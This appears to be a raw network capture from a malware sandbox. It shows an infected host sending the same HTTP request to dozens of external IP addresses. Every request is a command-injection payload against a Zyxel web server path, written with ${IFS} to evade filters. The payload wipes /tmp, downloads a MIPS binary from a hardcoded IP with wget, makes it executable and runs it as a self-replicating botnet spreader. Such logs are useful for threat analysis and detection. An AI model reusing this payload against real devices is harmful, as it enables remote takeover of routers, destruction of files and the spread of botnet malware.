                                        Mar 31, 2024 09:20:40.332425117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1569192.168.2.2352618208.239.211.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332463026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1570192.168.2.2359888108.162.70.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332504034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1571192.168.2.23430965.71.192.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332556009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1572192.168.2.2338018183.66.102.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332578897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1573192.168.2.2336132222.35.46.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332623959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1574192.168.2.2352062221.120.82.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332663059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1575192.168.2.2355920219.178.1.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332710981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1576192.168.2.2337646216.91.73.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332742929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1577192.168.2.2349892142.158.34.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332796097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1578192.168.2.23540665.44.153.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332825899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1579192.168.2.233512258.79.207.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332878113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1580192.168.2.2341790212.188.107.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332920074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1581192.168.2.235069880.214.240.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.332961082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1582192.168.2.2341036144.194.167.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333003998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1583192.168.2.2344628100.133.169.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333034039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1584192.168.2.235285299.22.29.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333075047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1585192.168.2.2335678182.124.69.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333120108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1586192.168.2.2357542145.34.83.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333152056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1587192.168.2.2341498142.90.200.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333194017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1588192.168.2.2359928204.197.68.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333239079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1589192.168.2.2347046101.42.213.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333287954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1590192.168.2.2347242212.53.21.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333314896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1591192.168.2.2340318221.103.53.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333364010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1592192.168.2.2346258150.106.118.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333412886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1593192.168.2.2354712147.23.178.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333448887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1594192.168.2.234036425.66.69.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333484888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1595192.168.2.2351012118.87.28.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333528042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1596192.168.2.2347576122.54.18.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333566904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1597192.168.2.234387283.24.52.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333587885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1598192.168.2.2338480128.63.86.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333622932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1599192.168.2.23559745.142.53.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333659887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1600192.168.2.233358834.170.255.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333703995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1601192.168.2.234027238.240.203.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333753109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1602192.168.2.234479220.119.89.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333800077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1603192.168.2.2350056188.115.205.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333862066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1604192.168.2.2350768147.250.7.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333885908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1605192.168.2.235200460.195.166.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333934069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1606192.168.2.2358226177.155.121.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333962917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1607192.168.2.235104881.148.234.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.333990097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1608192.168.2.2359222203.113.17.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334034920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1609192.168.2.2335812168.200.83.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334080935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1610192.168.2.23413641.10.170.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334137917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1611192.168.2.2352180155.244.42.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334170103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1612192.168.2.2351506184.171.33.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334209919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1613192.168.2.234509491.235.99.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334258080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1614192.168.2.2354912186.160.38.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334300041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1615192.168.2.2354158159.72.23.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334342957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1616192.168.2.2339936102.11.73.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334393978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1617192.168.2.234493825.37.36.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334424973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1618192.168.2.2339454107.206.83.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334465027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1619192.168.2.2347692149.158.48.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334506989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1620192.168.2.2338646154.174.131.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334537983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1621192.168.2.235108441.31.128.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334566116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1622192.168.2.2357752180.246.136.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334594011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1623192.168.2.234711463.195.117.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334655046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1624192.168.2.235296891.115.31.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334688902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1625192.168.2.2342864158.223.226.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334733963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1626192.168.2.233905673.9.205.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334774971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1627192.168.2.2337264135.255.168.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334821939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1628192.168.2.234883259.177.63.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334850073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1629192.168.2.233930852.117.105.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334903002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1630192.168.2.2348306101.9.210.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334927082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1631192.168.2.2337942196.103.166.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.334979057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1632192.168.2.2359782142.128.74.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335021019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1633192.168.2.2346086132.55.24.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335062981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1634192.168.2.2333062114.165.189.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335104942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1635192.168.2.235827043.68.165.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.335151911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1636192.168.2.235257037.235.178.2443
                                        TimestampBytes transferredDirectionData
